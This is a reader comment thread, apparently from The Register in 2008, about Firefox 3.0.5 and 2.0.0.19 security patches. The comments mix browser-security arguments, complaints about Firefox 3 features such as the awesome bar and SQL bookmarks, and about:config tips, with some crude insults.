This could be fun...
fanbitches will struggle here.
i.e gets shafted by a flaw, so people move to Opera (as per "security experts" advice),oh poo that has holes,off to FF, ahh crap. Safari...Ooopss
Yup we are all buggered.
Mozilla has rushed out updates to plug a few critical holes in versions 2 and 3 of its popular open source Firefox browser. Firefox 3.0.5 fixes three critical security flaws in the browser, while 2.0.0.19 stitches four critical vulns. Mozilla said that XSS vulnerabilities in SessionStore, XSS and so-called JavaScript “ …
Typical of Microsoft to release a half finished, half baked browser with all these XSS vulnerabilities and so on, plus charging over the odds for Apple's shiny look on this Chromey shiny Safari Vista!
Bah... I'm off to hand code HTML packets on my tuxedo wearing flightless cold bird flu iPenguin with the controlled hardware software combo from Redhatmondtino.
MS, Opera, and Mozilla are all rushing out critical fixes this week. Maybe one development model isn't inherently better than another. Maybe the only real way to ensure browser developers care about security is to enforce it from the user end by maintaining the competition and letting your favorite developer know you can and will switch whenever they seem to get too lazy...
Oh, wait, this is The Register. Opera got theirs out first! Suck on that, monolithic and open-source development fanbois!
As I understand it, XSS is using Javascript(or similar) to make objects from one domain appear to be from another. It also appears that every browser out there that supports scripting has found to be unsafe in it's handling of XSS.
So, my question is, is this a flaw in the implementation or is this how things were originally intended to work? The recent article about Google's scripts being referenced by Obama's website suggests that scripts from other domain are supposed to appear to be from the original domain and that the real problem here is that people let anyone who feels like it embed anything they like on their pages.
Secondly, using NoScript even before it's "XSS Prevention" used to prevent a lot of problems provided you whitelisted your sites correctly -- what's the difference between this and the new "XSS attack prevention"
Can anyone who knows their stuff explain?
As always, I'll upgrade to Firefox 3 when they fix the UI and give us back a proper way of storing bookmarks.
Honestly, though, I don't understand the fanboys: the only reasons I can see why Firefox is actually perceptably better than any other browser is the plugins that (theoretically) give the USERS control over their browsing experience, and even there, the only two that really matter are Adblock and Noscript, without which the internet is basically broken and unusable. This is not the future I was promised.
And of course, those Firefox plug-ins (AdBlock and NoScript) were written to imitate native Opera features...
I think browsers are like AV - all vendors are going to have issues from time to time, and we all need to pay attention to updates and revisions. The big test for vendors is how responsive they are to fixing problems (right now, Apple appear to be the slowest of the major browser vendors - they even make MS look good by comparison!).
"Can't someone just make a browser that doesn't have gaping security holes to start with?"
Try w3m. Or lynx, links and the like. Or Dillo if you *need* a graphic mode. Of course, these are secure because they don't run scripts, so you won't be less safe with FF and scripts disabled.
You can use a filtering proxy to tidy up the pages, too. But then again, all the fancy JS sites will be broken. Seriously, who the heck started this scripting madness in the first place? Give me my HTML web back!
@AC 17th December 2008 17:55 GMT:
Funny, I thought "better browser" was supposed to mean something like "we don't dictate our view of how you should work on you the way Microsoft does." That was incorrect?
@AC 17th December 2008 19:09 GMT:
Funny, I could have sworn the point was at least in part to improve the experience for the user and to make it easier, rather than to stick things in databases that are no longer realistically maintainable through shell scripts and, as I recall, make dialogue boxes non-resizeable. Or are we defining "improved" in the typical "it works for me, therefore there's no problem" FOSS-developer way?
In what world is an SQL database an appropriate method of storing bookmarks? Just because some FF developers have so many bookmarks they need a database to keep track of them doesn't mean everybody does (and yes, I know FF3 stores a lot more than bookmarks there, equally without logical reason). Instead of foisting their half-baked ideas on everyone who uses FF they should rather get rid of all their obsolete and redundant bookmarks, or implemented it as an extension. This is definitely an itch that didn't need scratching.
My feeling is that there must be a reason that every single browser on a Windows platform suffers from security holes. As long as the underlying operating system allows the application complete access to the system, rather than running it in a sandbox, we will see a never ending sequence of patches as yet more exploits are discovered in an ever expanding code base.
Now, if it was built on top of an inherently secure, compartmentalised operating system, it wouldn't matter how buggy the browser was, the users data would be protected.
I am sure that Linux and Mac are not perfect in this respect either.
How do you justify the headline for this article claiming Mozilla "rushed out" this security update? FF security updates are regular events, nothing new or "rushed" about this one I can see. No zero day vulns like IE just had - now that update was rushed out. Just because MS have rushed out a fix doesn't mean anyone else's updates have to be described as rushed. If you have any evidence for this claim then please provide it.
This post has been deleted by its author
as you can see by going to https://wiki.mozilla.org/Releases, this release has been planned for weeks and is part of Mozilla's regular update. The next one is planned for Feb 3rd. Presumably we can expect another Register article about security panics on Feb 4th. Or would the Register prefer it if browser makers didn't patch their software?
FF2.0.0.19 will no longer be updated? EXCELLENT-- finally will be rid of those annoying "do you want to update now" popups that always seem to pop up when I'm doing something really important (such as working on my banking site, about to click on a sell order on my brokerage site, or about to snipe something on eBay). Now FF 2 is TRULY perfect.
The one that irks me is how the Back pulldown and Forward pulldown were merged into a single list with less total entries. Yes, IT DID MATTER. A lot of the time the page I want to jump back to is 10-15 pages back, especially if you've been browsing about on Amazon or similar. Now you only get 7 forward, 7 back, and the confusion of seeing the page you are currently on.
Add to that FF3';s adoption of a NONSTANDARD cookie file format and their removal of useful stuff from Tools/Page Info and FF3 is a major regression for me. What? You thought Mozilla was all about standards? That went out about 4 years ago. Ever since its been all about the chrome, baby! Look at that snazzy backforward button that looks like something stolen from MS. How many extra cycles does it take to draw that versus a standard rectangular region?
Oh, and when FF first came out, then again in FF2 they took stuff out of Preferences and buried it in about:config. Now, with FF3 its still buried in about:config but you're warned that you are mucjking about in an area where you shouldn't! Seriously? Just to change my Ctrl+Wheel behavior?
Most of the people commenting here are crybabies. I use version 3 with no problems other than minor changes to about:config between major releases. I even got used to the awesomebar after guessing I would never like it. Now the sql storage is my ally, and I have no problem running even the nightlies on my windows, tiger and Linux boxes (even the slow ones). So why all the retardation? Are you not the people supposedly considering yourselves tech-literate? and Especially about the frequency of updates.. What the hell is wrong with you if you don't like your free software to be kept up to date? Guess there's just no pleasing some jerks.
Stop moaning. It's free.
If you don't like it, use another browser or write your own. Nobody's stopping you.
@Keith Doyle
No, you won't get any more updates for FF2. Of course, if you get screwed over by a vulnerability in an old and unsupported version of FF which you are using to control and run your finances via the web, then don't go whining that it's all Mozilla's fault. It won't be. It'll be your "change is scary" Luddite conservatism which is to blame.
My Firefox 3.0.4 on Ubuntu 8.10 seems to be chugging along without any problems.
Why am I not overwhelmed with paranoid type anxiety?
Anyway what with Climate Change/Financial system Meltdown/ Credit Crunch/ Mr. Madoff of New York etc , I am surprised all you lot have not gone into your bunkers by now
Want to turn off the 'Awesome' bar? Allow me to let you in to a closely guarded secret - you can do it! Just by typing, you don't need no stinkin' extension!
It's even been published on El Reg several times already!
There's a top secret L33t HaX0r way of finding out what to do. The thing is: there's this pretty good website called 'Google' that runs this, like, index of the Internet. And the best thing is - you can search it! So if you go to Google and you type in something really complex like
turn off Firefox awesome bar
Any one of the 74,800 hits will tell you ...
In the 'Awesome' bar type
about:config (and press Enter)
Find the line for
browser.urlbar.matchonlytyped
Click that line so that the value changes to true
The end.
Now put your computer back in the box it came in, and send it back to the manufacturer asking for a full refund.
Well, after reading the Reg for some six months, I've finally installed Noscript, so thanks Reg commentators, evidently repetition does work. Had Adblock and Firephorm for some time (with BT until they change the T&Cs), for some time.
I still think Firefox is the best (and safest) when you include the plugins IMHO.
+1 to Firefox 3.
So they're not issuing any more updates for FF2. That's responsible.
Funny isn't it the the lovely, touchy feely people at Mozilla are forcing their EUs to upgrade when even Microsoft don't indulge in that sort of behaviour. Updates for earlier versions of IE are still produced. And don't give me all that bull about their being non profit making. If they want to be taken seriously in the market then they need to provide the same service as the other players in the market.
"So, you fiddle around with your bookmarks using "Organise Bookmarks" until they do what you want, then you select the Backup/Restore button and you can then backup, restore or even <gasp!> Import and Export as HTML"
Even better, install the foxmarks plugin and you can share/backup your bookmarks on every PC you use
I take it that i'm the only person who doesn't really have a problem with Firefox 3 then?
That said, i'm thinking about jumping ship to Chrome once it comes out of Beta.
Actually, I just looked at the Google Chrome page and it's missing the Beta tag, so it looks like i'll be downloading and installing that when I get home today then!
Could the fans of the RetardedBar please explain why:
a) The FF3 "organise bookmark" interface is shittier than FF2's?
b) I have to export or backup my bookmarks in FF3 after editing any of them, or else the changes are reverted when I restart Firefox? And no, there are no permission problems.
And to those RetardedBar haters who can't Google, there are actually serveral things that need to be done to reduce the annoyance factor.
1)If you wan't the dropdown list, install the Oldbar extension, this makes the dropdown list appear like FF2's, but doesn't change the RetardedBar's behavior.
Then In about :config
2) set browser.urlbar.matchOnlyTyped to true
3) set browser.urlbar.maxRichResults to 5 or so, or 0 if you don't wan't the drop-down at all.
This reduces the annoyance factor significantly. There are a couple of other settings that can be tweaked, but these are the most important. More are coming in FF3.1
These setting would not be there if not for all the diligent bug-reporters who endured and rode out a tide of hatred from the Mozilla fanbois, and plain arrogance by several developers, during the Alpha and Beta testing of FF3.
Preach it, AC.
IE6: released 27 August 2001, supported until 13 Jul 2010
FF2: released 24 October 2006, supported until 16 December 2008
And people wonder why grown-up organisations - who are often squeezed to complete the evaluation, sign-off and rollout of an app in under two years find it hard to take the Mozilla org seriously? We are, after all, talking about an application which famously is about as amenable to centralised management as a pissed-off tomcat.
(aside: where's the Asa-Dotzler-with-horns piccy?)
Interesting that the FF3 fanbois are all ACs. At any rate, unlike most people (apparently), I don't depend on the browser for security. And that includes protection against phishing sites, buffer overflows and stealth XML, ActiveX or other such nonsense.
FF3 has resurrected all of the same reasons I stopped using Netscape, Mozilla and, for that matter, IE. The developer's just don't get it. They can't keep themselves from bloating the browser with unnecessary and redundant features such as tabs and databases (and for that matter, bookmarking-- which need to be accessed on all the user's computers and shouldn't be stored at all on web clients). And while they're so busy adding useless features, critical ones they should be concentrating on are completely ignored (like user interruption protection-- THOU SHALL NOT STEAL KEYBOARD FOCUS AWAY FROM ME WHILE I"M TYPING -- and while that may be the OS' job, if they're not doing it, the browser can and should).
I may move away from FF2 at some point, but I can tell you it ain't gonna be to FF3.
I'm just glad there is Seamonkey available, which doesn't treat you like a clueless newbie like IE and FF (as it wants to imitate IE) do.
For anyone frustrated with FF, try Seamonkey, same browsing engine as FF, therefore same extensions and plugins as FF, but much better UI, more configurable, and no useless cpu-consuming gimmicks.
I already tried that, it doesn't solve the main problem:
if I want to go to google, I start to type it in. When I type go, google should appear, being the most visited address starting with go. Instead, I get random websites that contain go in their title bar, or, even more annoyingly, IN THE MIDDLE OF THE URL. I only want it to match the start of a URL, not the middle, and not titles at all.